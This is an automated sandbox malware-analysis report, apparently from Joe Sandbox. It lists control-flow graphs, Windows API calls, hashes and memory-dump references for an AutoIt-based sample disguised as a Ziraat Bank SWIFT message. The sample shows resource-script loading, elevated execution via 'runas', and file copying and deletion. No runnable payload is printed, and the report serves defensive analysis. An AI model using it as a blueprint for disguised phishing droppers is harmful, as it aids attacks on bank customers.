                                                                                                                                                        • Instruction ID: f4cb2f8d5b1020c0955541c39b621468e93228d942a4e44f599a032a96de33c6
                                                                                                                                                        • Opcode Fuzzy Hash: 14b37e99e6b67c2d3a7853a518fd08583b6d7efd2b54fe0d79ab11d15510882d
                                                                                                                                                        • Instruction Fuzzy Hash: 9A325F75B022288BCB249F98DC456E9B7F5FF4B310F1841D9E40AA7A92D7749E80CF52

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 633 9ddc0-9de4f call 8d7f7 GetVersionExW call 86a63 call 9dfb4 call 86571 642 f24c8-f24cb 633->642 643 9de55-9de56 633->643 646 f24cd 642->646 647 f24e4-f24e8 642->647 644 9de58-9de63 643->644 645 9de92-9dea2 call 9df77 643->645 651 9de69-9de6b 644->651 652 f244e-f2454 644->652 664 9dea4-9dec1 GetCurrentProcess call 9df5f 645->664 665 9dec7-9dee1 645->665 648 f24d0 646->648 649 f24ea-f24f3 647->649 650 f24d3-f24dc 647->650 648->650 649->648 656 f24f5-f24f8 649->656 650->647 657 f2469-f2475 651->657 658 9de71-9de74 651->658 654 f245e-f2464 652->654 655 f2456-f2459 652->655 654->645 655->645 656->650 660 f247f-f2485 657->660 661 f2477-f247a 657->661 662 9de7a-9de89 658->662 663 f2495-f2498 658->663 660->645 661->645 669 f248a-f2490 662->669 670 9de8f 662->670 663->645 671 f249e-f24b3 663->671 664->665 684 9dec3 664->684 667 9df31-9df3b GetSystemInfo 665->667 668 9dee3-9def7 call 9e00c 665->668 673 9df0e-9df1a 667->673 681 9df29-9df2f GetSystemInfo 668->681 682 9def9-9df01 call 9dff4 GetNativeSystemInfo 668->682 669->645 670->645 675 f24bd-f24c3 671->675 676 f24b5-f24b8 671->676 678 9df1c-9df1f FreeLibrary 673->678 679 9df21-9df26 673->679 675->645 676->645 678->679 683 9df03-9df07 681->683 682->683 683->673 687 9df09-9df0c FreeLibrary 683->687 684->665 687->673
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?,00000000), ref: 0009DDEC
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,0011DC38,?,?), ref: 0009DEAC
                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,0011DC38,?,?), ref: 0009DF01
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009DF0C
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009DF1F
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,0011DC38,?,?), ref: 0009DF29
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,0011DC38,?,?), ref: 0009DF35
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3851250370-0
                                                                                                                                                        • Opcode ID: e6ff429fbc7079cbc2976759ef95aa38d0decbe191059c992a093441662d2599
                                                                                                                                                        • Instruction ID: 0f568be449be72a5072068f69184c918341d0e0f9684b264beb8d63b68ce92d5
                                                                                                                                                        • Opcode Fuzzy Hash: e6ff429fbc7079cbc2976759ef95aa38d0decbe191059c992a093441662d2599
                                                                                                                                                        • Instruction Fuzzy Hash: AC61C1B180A384CFCF15DF6898C11ED7FB4AF29300B1989EAD8859F24BC674C949DB65

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00083DC8
                                                                                                                                                          • Part of subcall function 00086430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00083DEE,00141148,?), ref: 00086471
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00083E48
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00141148,?), ref: 000F1D06
                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,0011DAB4,00141148,?), ref: 000F1D89
                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,0011DAB4,00141148,?), ref: 000F1D90
                                                                                                                                                          • Part of subcall function 00083E6E: GetSysColorBrush.USER32(0000000F), ref: 00083E79
                                                                                                                                                          • Part of subcall function 00083E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00083E88
                                                                                                                                                          • Part of subcall function 00083E6E: LoadIconW.USER32(00000063), ref: 00083E9E
                                                                                                                                                          • Part of subcall function 00083E6E: LoadIconW.USER32(000000A4), ref: 00083EB0
                                                                                                                                                          • Part of subcall function 00083E6E: LoadIconW.USER32(000000A2), ref: 00083EC2
                                                                                                                                                          • Part of subcall function 00083E6E: RegisterClassExW.USER32(?), ref: 00083F30
                                                                                                                                                          • Part of subcall function 000836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 000836E6
                                                                                                                                                          • Part of subcall function 000836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00083707
                                                                                                                                                          • Part of subcall function 000836B8: ShowWindow.USER32(00000000), ref: 0008371B
                                                                                                                                                          • Part of subcall function 000836B8: ShowWindow.USER32(00000000), ref: 00083724
                                                                                                                                                          • Part of subcall function 00084FFC: _memset.LIBCMT ref: 00085022
                                                                                                                                                          • Part of subcall function 00084FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000850CB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$IconLoad$CreateCurrentDirectoryFullNamePathShow$BrushClassColorCursorExecuteForegroundNotifyRegisterShellShell__memset
                                                                                                                                                        • String ID: runas
                                                                                                                                                        • API String ID: 4126474716-4000483414
                                                                                                                                                        • Opcode ID: 0de8e466a2cb92bc975e4d4d327032254760a52caf74fb820f10573b928ea13f
                                                                                                                                                        • Instruction ID: d6d0a46309f228cb3bb18c55937c70c899b9ceb33593969a7365e3beae305fc3
                                                                                                                                                        • Opcode Fuzzy Hash: 0de8e466a2cb92bc975e4d4d327032254760a52caf74fb820f10573b928ea13f
                                                                                                                                                        • Instruction Fuzzy Hash: 4731CF75E04248BADF11BBF0EC05EED7B75BB56B04F004069E681665A3DB7446C5CB21

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 786 8406b-84083 CreateStreamOnHGlobal 787 840a3-840a6 786->787 788 84085-8409c FindResourceExW 786->788 789 f4f16-f4f25 LoadResource 788->789 790 840a2 788->790 789->790 791 f4f2b-f4f39 SizeofResource 789->791 790->787 791->790 792 f4f3f-f4f4a LockResource 791->792 792->790 793 f4f50-f4f58 792->793 794 f4f5c-f4f6e 793->794 794->790
                                                                                                                                                        APIs
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0008449E,?,?,00000000,00000001), ref: 0008407B
                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0008449E,?,?,00000000,00000001), ref: 00084092
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB), ref: 000F4F1A
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB), ref: 000F4F2F
                                                                                                                                                        • LockResource.KERNEL32(0008449E,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB,00000000), ref: 000F4F42
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                        • Opcode ID: 6f1bd41e807b57067dec9e07a111fd9f22c2dc2232f34f3c97252202605ac1e1
                                                                                                                                                        • Instruction ID: fc3a8ea084ade17ff139578ca25a4ac0dac90b3aadb8eeae9f363ff824f0af7e
                                                                                                                                                        • Opcode Fuzzy Hash: 6f1bd41e807b57067dec9e07a111fd9f22c2dc2232f34f3c97252202605ac1e1
                                                                                                                                                        • Instruction Fuzzy Hash: AC113C71200711BFE7219B65EC48F677BB9EBC5B51F10816CF682966A0DBB1DC408A20
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,000F2F49), ref: 000C6CB9
                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 000C6CCA
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 000C6CDA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 48322524-0
                                                                                                                                                        • Opcode ID: 5a7b279228f21a94a9e39e5a095b2978824a8f1a3e92a633c6d7ad411bd01890
                                                                                                                                                        • Instruction ID: 051fb504af5a60bc8a58de33c7f62eebb342e38dbfd40a8980e0327ceb558082
                                                                                                                                                        • Opcode Fuzzy Hash: 5a7b279228f21a94a9e39e5a095b2978824a8f1a3e92a633c6d7ad411bd01890
                                                                                                                                                        • Instruction Fuzzy Hash: 09E09A31810410AB82206778AC498AE36ACEF06339B10075AF8B2C21E0EBB6998086D6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: ed53948b57ebb96309eb64a45b1bf2257701b9af353c4147b11665c3d9bbee9c
                                                                                                                                                        • Instruction ID: 9e3fb0d792943ee47c6329cfff0da13b43392cd50c75f5d4cb5220a183a2a53d
                                                                                                                                                        • Opcode Fuzzy Hash: ed53948b57ebb96309eb64a45b1bf2257701b9af353c4147b11665c3d9bbee9c
                                                                                                                                                        • Instruction Fuzzy Hash: B4429C70608341DFDB64DF18C484B6ABBE1BF84304F15886DE99A8B662C731ED45EF92
                                                                                                                                                        APIs
                                                                                                                                                        • ___createFile.LIBCMT ref: 000B5EC3
                                                                                                                                                        • ___createFile.LIBCMT ref: 000B5F04
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B5F2D
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 000B5F34
                                                                                                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 000B5F47
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B5F6A
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 000B5F73
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B5F7C
                                                                                                                                                        • __set_osfhnd.LIBCMT ref: 000B5FAC
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 000B6016
                                                                                                                                                        • __close_nolock.LIBCMT ref: 000B603C
                                                                                                                                                        • __chsize_nolock.LIBCMT ref: 000B606C
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 000B607E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 000B6176
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 000B618B
                                                                                                                                                        • __close_nolock.LIBCMT ref: 000B61EB
                                                                                                                                                          • Part of subcall function 000AEA9C: CloseHandle.KERNELBASE(00000000,0012EEF4,00000000,?,000B6041,0012EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AEAEC
                                                                                                                                                          • Part of subcall function 000AEA9C: GetLastError.KERNEL32(?,000B6041,0012EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AEAF6
                                                                                                                                                          • Part of subcall function 000AEA9C: __free_osfhnd.LIBCMT ref: 000AEB03
                                                                                                                                                          • Part of subcall function 000AEA9C: __dosmaperr.LIBCMT ref: 000AEB25
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 000B620D
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6342
                                                                                                                                                        • ___createFile.LIBCMT ref: 000B6361
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000B636E
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 000B6375
                                                                                                                                                        • __free_osfhnd.LIBCMT ref: 000B6395
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 000B63C3
                                                                                                                                                        • __wsopen_helper.LIBCMT ref: 000B63DD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3896587723-2766056989
                                                                                                                                                        • Opcode ID: d15aaab1182c0bdf17ebd0b787caf0cea268d732a6acad142dba68488940bb20
                                                                                                                                                        • Instruction ID: d03a8ad8df0568bc52204f7fb6954f113e4c72307c390aae1314925c7fa7f588
                                                                                                                                                        • Opcode Fuzzy Hash: d15aaab1182c0bdf17ebd0b787caf0cea268d732a6acad142dba68488940bb20
                                                                                                                                                        • Instruction Fuzzy Hash: F32238719046069FEF299FA8DC45BFD7BB1EB05324F284269E5219B2D2C73A8D40C751

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 225 cfa0c-cfa37 call af8a0 228 cfa4d 225->228 229 cfa39-cfa4b call 8d286 225->229 231 cfa52-cfa6d call 8936c call 9ec2f 228->231 229->228 229->231 237 cfd12-cfd1a 231->237 238 cfa73-cfa7a 231->238 239 cfb68-cfb7b call 841a9 238->239 240 cfa80-cfaae call 8936c call a0d23 call a23f6 238->240 245 cfb7d-cfb90 call 841a9 239->245 246 cfbba-cfbf4 call 8936c call a1dfc 239->246 258 cfaef-cfb1e call 8936c call a0d23 call c72cb 240->258 259 cfab0-cfaee call a0d23 call a0cf4 call 8936c call a0cf4 240->259 245->246 254 cfb92-cfb9c call 83321 245->254 263 cfc25-cfcb3 call a0d23 call a0cf4 * 3 call 8936c call c690b call c6524 246->263 264 cfbf6-cfbff 246->264 261 cfba1-cfbb5 call 92c20 254->261 288 cfb3b-cfb60 call 8936c call c60dd 258->288 289 cfb20-cfb39 call a0cdb 258->289 259->258 261->237 308 cfcbb-cfcbd 263->308 309 cfcb5-cfcb9 263->309 264->263 269 cfc01-cfc22 call a0d23 * 2 264->269 269->263 288->237 303 cfb66 288->303 289->261 289->288 303->261 310 cfcbf-cfcdd call 8936c call cbfa4 308->310 311 cfcf5-cfd02 call 92c20 308->311 309->308 309->310 318 cfce2-cfce4 310->318 317 cfd09-cfd0d call 84252 311->317 317->237 318->317 320 cfce6-cfcf0 call 83321 318->320 320->311
                                                                                                                                                        APIs
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CFA96
                                                                                                                                                        • _wcschr.LIBCMT ref: 000CFAA4
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CFABB
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CFACA
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CFAE8
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CFB09
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000CFBE6
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CFC0B
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CFC1D
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CFC32
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CFC47
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CFC59
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CFC6E
                                                                                                                                                          • Part of subcall function 000CBFA4: _wcscmp.LIBCMT ref: 000CC03E
                                                                                                                                                          • Part of subcall function 000CBFA4: __wsplitpath.LIBCMT ref: 000CC083
                                                                                                                                                          • Part of subcall function 000CBFA4: _wcscpy.LIBCMT ref: 000CC096
                                                                                                                                                          • Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0A9
                                                                                                                                                          • Part of subcall function 000CBFA4: __wsplitpath.LIBCMT ref: 000CC0CE
                                                                                                                                                          • Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0E4
                                                                                                                                                          • Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0F7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                        • API String ID: 2955681530-2806939583
                                                                                                                                                        • Opcode ID: 2a22c8c2606b9c49430ba2a11c22e34154a878c6e255f60e29e6877f768c8738
                                                                                                                                                        • Instruction ID: 44a753674bf34f0c164d04a6cfd2749f0c89dd07830eac2a34032ae9dcd218df
                                                                                                                                                        • Opcode Fuzzy Hash: 2a22c8c2606b9c49430ba2a11c22e34154a878c6e255f60e29e6877f768c8738
                                                                                                                                                        • Instruction Fuzzy Hash: 1D91A072504306AFCB20EB54C851FEEB3E9BF94310F04482DF99997292DB30EA44CB92

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00083F86
                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00083FB0
                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00083FC1
                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00083FDE
                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00083FEE
                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00084004
                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00084013
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                                        • Opcode ID: 6d87f51828197666054686dfe9e881967e8aaa364f3d5aed0b2736da9037c3fe
                                                                                                                                                        • Instruction ID: a137891b14474391f7d8662ad17fa92edf1a76e736d93982b145cf607699edc7
                                                                                                                                                        • Opcode Fuzzy Hash: 6d87f51828197666054686dfe9e881967e8aaa364f3d5aed0b2736da9037c3fe
                                                                                                                                                        • Instruction Fuzzy Hash: 0C21C7B9900318AFDB00DFE4E889BCDBBB4FB09714F01421AFA55A66A0D7F545C48F91

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 472 cbfa4-cc054 call af8a0 call 9f4ea call 847b7 call cbdb4 call 84517 call a15e3 485 cc05a-cc061 call cc56d 472->485 486 cc107-cc10e call cc56d 472->486 491 cc067-cc105 call a1dfc call a0d23 call a0cf4 call a1dfc call a0cf4 * 2 485->491 492 cc110-cc112 485->492 486->492 493 cc117 486->493 496 cc11a-cc1d6 call 844ed * 8 call cc71a call a3499 491->496 495 cc367-cc368 492->495 493->496 497 cc385-cc393 call 847e2 495->497 531 cc1df-cc1fa call cbdf8 496->531 532 cc1d8-cc1da 496->532 535 cc28c-cc298 call a35e4 531->535 536 cc200-cc208 531->536 532->495 543 cc2ae-cc2b2 535->543 544 cc29a-cc2a9 DeleteFileW 535->544 537 cc20a-cc20e 536->537 538 cc210 536->538 540 cc215-cc233 call 844ed 537->540 538->540 548 cc25d-cc273 call cb791 call a2aae 540->548 549 cc235-cc23b 540->549 546 cc2b8-cc32f call cc81d call cc845 call cb965 543->546 547 cc342-cc356 CopyFileW 543->547 544->495 552 cc36a-cc380 DeleteFileW call cc6d9 546->552 568 cc331-cc340 DeleteFileW 546->568 551 cc358-cc365 DeleteFileW 547->551 547->552 565 cc278-cc283 548->565 554 cc23d-cc250 call cbf2e 549->554 551->495 552->497 563 cc252-cc25b 554->563 563->548 565->536 567 cc289 565->567 567->535 568->495
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000CBDB4: __time64.LIBCMT ref: 000CBDBE
                                                                                                                                                          • Part of subcall function 00084517: _fseek.LIBCMT ref: 0008452F
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000CC083
                                                                                                                                                        • _wcscpy.LIBCMT ref: 000CC096
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CC0A9
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 000CC0CE
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CC0E4
                                                                                                                                                        • _wcscat.LIBCMT ref: 000CC0F7
                                                                                                                                                        • _wcscmp.LIBCMT ref: 000CC03E
                                                                                                                                                          • Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC65D
                                                                                                                                                          • Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC670
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CC2A1
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CC338
                                                                                                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CC34E
                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CC35F
